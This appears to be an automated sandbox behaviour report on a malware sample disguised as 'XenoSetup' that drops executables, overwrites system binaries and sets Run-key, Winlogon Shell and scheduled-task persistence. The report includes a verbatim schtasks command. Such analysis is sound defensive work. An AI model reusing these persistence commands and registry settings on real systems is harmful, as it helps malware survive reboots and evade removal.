Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3477D2A5 pushad ; iretd	2_2_00007FFD3477D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34962316 push 8B485F94h; iretd	2_2_00007FFD3496231B
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FFF640 push ecx; ret	6_2_00FFF653
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FFEB78 push eax; ret	6_2_00FFEB96
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34893884 push ds; iretd	15_2_00007FFD34893887
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34896BD4 push cs; iretd	15_2_00007FFD34896BD5
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348CC308 push E8FFFFFEh; iretd	31_2_00007FFD348CC30D
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348C8FEB push ss; iretd	31_2_00007FFD348C8FF9
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348C93B7 push edx; retf	31_2_00007FFD348C93BD
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348B387A push ds; iretd	31_2_00007FFD348B3887
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348B6BD4 push cs; iretd	31_2_00007FFD348B6BD5
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348D5D88 pushad ; retf	31_2_00007FFD348D5D89
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348D4ED3 push esi; iretd	31_2_00007FFD348D5537
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348BC308 push E8FFFFFEh; iretd	32_2_00007FFD348BC30D
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348B8FEB push ss; iretd	32_2_00007FFD348B8FF9
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348B93B7 push edx; retf	32_2_00007FFD348B93BD
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348C5D88 pushad ; retf	32_2_00007FFD348C5D89
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348C4ED3 push esi; iretd	32_2_00007FFD348C5537
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348A3884 push ds; iretd	32_2_00007FFD348A3887
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348A6BD4 push cs; iretd	32_2_00007FFD348A6BD5
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348C5D88 pushad ; retf	40_2_00007FFD348C5D89
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348C4ED3 push esi; iretd	40_2_00007FFD348C5537
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348A387A push ds; iretd	40_2_00007FFD348A3887
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348A6BD4 push cs; iretd	40_2_00007FFD348A6BD5
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348BC308 push E8FFFFFEh; iretd	40_2_00007FFD348BC30D
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348B8FEB push ss; iretd	40_2_00007FFD348B8FF9
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348B93B7 push edx; retf	40_2_00007FFD348B93BD
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 41_2_00007FFD3489387A push ds; iretd	41_2_00007FFD34893887
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 41_2_00007FFD34896BD4 push cs; iretd	41_2_00007FFD34896BD5
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 41_2_00007FFD348AC308 push E8FFFFFEh; iretd	41_2_00007FFD348AC30D

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\jCRLjesV.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ogLKbooN.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\KZGGSUqY.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\tBjJkMRH.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\BFVQSOun.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\UWIwmTED.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	File created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\dQveIBvX.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\gQJUAkON.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\BOtQCANk.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\NoWOUMSl.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\FSpHSmDL.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\RPLnQAKH.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\eDXMSiYF.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\lmJukoKX.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\paukoYZl.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\WKMEYgAB.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ZTxvzCno.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\BcHAIFcQ.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\kEjDZxDz.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\uOpJsBHp.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\GyShWgyC.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\qodKYthi.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\vMsrqipz.log	Jump to dropped file
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\eLGexRyL.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\MPdHuBxA.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\bGOWfMqu.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\GpvhmufF.log	Jump to dropped file
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\Xeno.exe	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ItmQLqVf.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ZSKNtyuw.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\remTNUPL.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\UfDWuYEk.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\LxMgmcSS.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe.exe (copy)	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\frbUEvTD.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\vcvJAqxW.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\Aqnqislq.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\xvoKkvvU.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\NpzpwslB.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ARRIhAyp.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ldZbGFkR.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\LuUydMov.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\PIQPERQj.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\pczkrlLQ.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\IlCyhHua.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\GGCzAPYH.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\ESyrPCdJ.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\TZhoQTpI.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\XOSeUCEW.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\NZUxJEKO.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe			Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe			Jump to dropped file

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\tBjJkMRH.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\KZGGSUqY.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\Aqnqislq.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\bGOWfMqu.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ItmQLqVf.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\pczkrlLQ.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\WKMEYgAB.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\lmJukoKX.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\TZhoQTpI.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\RPLnQAKH.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\IlCyhHua.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\remTNUPL.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ZSKNtyuw.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\NZUxJEKO.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\vMsrqipz.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ldZbGFkR.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\UWIwmTED.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\BFVQSOun.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ogLKbooN.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ARRIhAyp.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\LxMgmcSS.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\BOtQCANk.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\jCRLjesV.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Users\user\Desktop\ZTxvzCno.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\ESyrPCdJ.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\BcHAIFcQ.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\qodKYthi.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\NoWOUMSl.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\vcvJAqxW.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\PIQPERQj.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\xvoKkvvU.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\uOpJsBHp.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\NpzpwslB.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\dQveIBvX.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\UfDWuYEk.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\gQJUAkON.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\FSpHSmDL.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\MPdHuBxA.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\GpvhmufF.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\paukoYZl.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\frbUEvTD.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\XOSeUCEW.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\GGCzAPYH.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\eLGexRyL.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\LuUydMov.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\kEjDZxDz.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\GyShWgyC.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File created: C:\Users\user\Desktop\eDXMSiYF.log	Jump to dropped file

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.log

Jump to behavior

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
